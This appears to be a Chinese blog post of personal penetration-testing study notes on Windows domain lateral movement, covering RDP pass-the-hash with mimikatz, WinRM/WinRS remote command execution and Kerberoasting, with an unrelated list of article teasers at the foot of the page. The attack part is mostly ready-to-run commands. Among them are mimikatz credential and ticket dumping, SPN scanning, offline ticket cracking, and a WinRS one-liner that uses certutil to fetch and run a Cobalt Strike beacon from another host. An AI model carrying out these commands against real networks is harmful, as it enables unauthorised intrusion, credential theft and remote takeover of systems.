8、内网安全-横向移动RDPKerberos攻击SPN扫描WinRMWinRS

2024-02-19 08:12
文章标签 安全 攻击 扫描 移动 横向 spn rdpkerberos winrmwinrs

本文主要是介绍8、内网安全-横向移动RDPKerberos攻击SPN扫描WinRMWinRS,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-RDP-明文&NTLM

1.探针服务:

2.探针连接:

3.连接执行:

二、域横向移动-WinRM&WinRS-明文&NTLM

1.探针可用:

2.连接执行:

3.上线 CS&MSF:

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

Kerberoasting攻击的利用:

一、域横向移动-RDP-明文&NTLM

RDP连接:
1、直接在当前被控主机上进行远程连接
2、建立节点进行连接
3、端口的转发(当前2222去访问目标的3389) ——  访问被控2222

远程桌面服务 支持明文及 HASH 连接
条件:双方开启 RDP 服务 远程桌面

1.探针服务:

cs 内置端口扫描 3389
tasklist /svc | find "TermService"      # 找到对应服务进程的 PID
netstat -ano | find "PID "              # 找到进程对应的端口号

2.探针连接:

CrackMapExec&MSF 批扫用户名密码验证
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket-CSDN博客

3.连接执行: 

明文连接:
mstsc /console /v:192.168.3.32 /admin
HASH 连接:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

二、域横向移动-WinRM&WinRS-明文&NTLM

WinRM 代表 Windows 远程管理,是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持 Kerberos NTLM 身份验证以及基本身份验证。
移动条件:双方都启用的 Winrm rs 的服务!
使用此服务需要管理员级别凭据。
Windows 2008 以上版本默认自动状态, Windows Vista/win7 上必须手动启动;
Windows 2012 之后的版本默认允许远程任意主机来管理。
攻击机开启:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:

cs 内置端口扫描 5985
powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

2.连接执行:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线 CS&MSF:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe & beacon.exe"

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

应用背景:在得不到正确密码明文值或哈希值的情况下,实现横向移动。

资源:

https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html

Kerberoasting攻击的利用:

•SPN服务发现
•请求服务票据
•服务票据的导出
•服务票据的暴力破解

如需利用需要配置策略加密方式(对比)
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个
目标服务的服务票证。
DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能验证用
户是否可以访问。
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码
哈希用于加密服务票证。 

黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为
Kerberoast攻击。
如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值
就将用于创建服务票证。

Kerberoast攻击条件:
采用rc4加密类型票据,工具Rubeus检测或看票据加密类型


1.扫描:

powershell setspn -T 0day.org -q */*
powershell setspn -T 0day.org -q */* | findstr "MSSQL"


2.检测:

Rubeus kerberoast

3.请求:

powershell Add-Type -AssemblyName System.IdentityModelpowershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"mimikatz kerberos::ask /target:MSSQLSvc/Sqlserver.god.org:1433

4.查看和导出票据:

查看票据:klist
导出:
mimikatz kerberos::list /export

5.破解:

python tgsreporack.py pass.txt "1-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi"

6.重写:

https://www.freebuf.com/articles/system/174967.html

这篇关于8、内网安全-横向移动RDPKerberos攻击SPN扫描WinRMWinRS的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/724056

相关文章

客户案例:安全海外中继助力知名家电企业化解海外通邮困境

客户案例:安全海外中继助力知名家电企业化解海外通邮困境

1、客户背景 广东格兰仕集团有限公司(以下简称“格兰仕”),成立于1978年,是中国家电行业的领军企业之一。作为全球最大的微波炉生产基地,格兰仕拥有多项国际领先的家电制造技术,连续多年位列中国家电出口前列。格兰仕不仅注重业务的全球拓展,更重视业务流程的高效与顺畅,以确保在国际舞台上的竞争力。 2、需求痛点 随着格兰仕全球化战略的深入实施,其海外业务快速增长,电子邮件成为了关键的沟通工具。
阅读更多...
安全管理体系化的智慧油站开源了。

安全管理体系化的智慧油站开源了。

AI视频监控平台简介 AI视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。摄像头管理模块用于多种终端设备、智能设备的接入及管理。平台支持包括摄像头等终端感知设备接入,为整个平台提
阅读更多...
2024网安周今日开幕,亚信安全亮相30城

2024网安周今日开幕,亚信安全亮相30城

2024年国家网络安全宣传周今天在广州拉开帷幕。今年网安周继续以“网络安全为人民,网络安全靠人民”为主题。2024年国家网络安全宣传周涵盖了1场开幕式、1场高峰论坛、5个重要活动、15场分论坛/座谈会/闭门会、6个主题日活动和网络安全“六进”活动。亚信安全出席2024年国家网络安全宣传周开幕式和主论坛,并将通过线下宣讲、创意科普、成果展示等多种形式,让广大民众看得懂、记得住安全知识,同时还
阅读更多...
我在移动打工的日志

我在移动打工的日志

客户:给我搞一下录音 我:不会。不在服务范围。 客户:是不想吧 我:笑嘻嘻(气笑) 客户:小姑娘明明会,却欺负老人 我:笑嘻嘻 客户:那我交话费 我:手机号 客户:给我搞录音 我:不会。不懂。没搞过。 客户:那我交话费 我:手机号。这是电信的啊!!我这是中国移动!! 客户:我不管,我要充话费,充话费是你们的 我:可是这是移动!!中国移动!! 客户:我这是手机号 我:那又如何,这是移动!你是电信!!
阅读更多...
【Kubernetes】K8s 的安全框架和用户认证

【Kubernetes】K8s 的安全框架和用户认证

K8s 的安全框架和用户认证 1.Kubernetes 的安全框架1.1 认证:Authentication1.2 鉴权:Authorization1.3 准入控制:Admission Control 2.Kubernetes 的用户认证2.1 Kubernetes 的用户认证方式2.2 配置 Kubernetes 集群使用密码认证 Kubernetes 作为一个分布式的虚拟
阅读更多...
速盾高防cdn是怎么解决网站攻击的?

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网
阅读更多...
用Unity2D制作一个人物,实现移动、跳起、人物静止和动起来时的动画:中(人物移动、跳起、静止动作)

用Unity2D制作一个人物,实现移动、跳起、人物静止和动起来时的动画:中(人物移动、跳起、静止动作)

上回我们学到创建一个地形和一个人物,今天我们实现一下人物实现移动和跳起,依次点击,我们准备创建一个C#文件 创建好我们点击进去,就会跳转到我们的Vision Studio,然后输入这些代码 using UnityEngine;public class Move : MonoBehaviour // 定义一个名为Move的类,继承自MonoBehaviour{private Rigidbo
阅读更多...
简单的角色响应鼠标而移动

简单的角色响应鼠标而移动

actor类 //处理移动距离,核心是找到角色坐标在世界坐标的向量的投影(x,y,z),然后在世界坐标中合成,此CC是在地面行走,所以Y轴投影始终置为0; using UnityEngine; using System.Collections; public class actor : MonoBehaviour { public float speed=0.1f; CharacterCo
阅读更多...
企业安全之WiFi篇

企业安全之WiFi篇

很多的公司都没有安全团队,只有运维来负责整个公司的安全,从而安全问题也大打折扣。我最近一直在给各个公司做安全检测,就把自己的心得写下来,有什么不足之处还望补充。 0×01  无线安全 很多的公司都有不怎么注重公司的无线电安全,有钱的公司买设备,没钱的公司搞人力。但是人的技术在好,没有设备的辅助,人力在牛逼也没有个卵用。一个好的路由器、交换机、IDS就像你装备了 无尽、狂徒、杀人书一
阅读更多...
Linux 安全弹出外接磁盘

Linux 安全弹出外接磁盘

命令行操作 首先,需要卸载硬盘上的所有分区,可以使用umount来卸载分区 清空系统缓存,将所有的数据写入磁盘 sync 列出已挂载的文件系统 使用lsblk或者df命令来查找要卸载的分区 lsblk or df -h 确保没有文件正在使用 使用lsof 命令来检查 sudo lsof |grep /dev/sdc 卸载分区 假设硬盘的分区是 /dev/sdc1,使用u
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2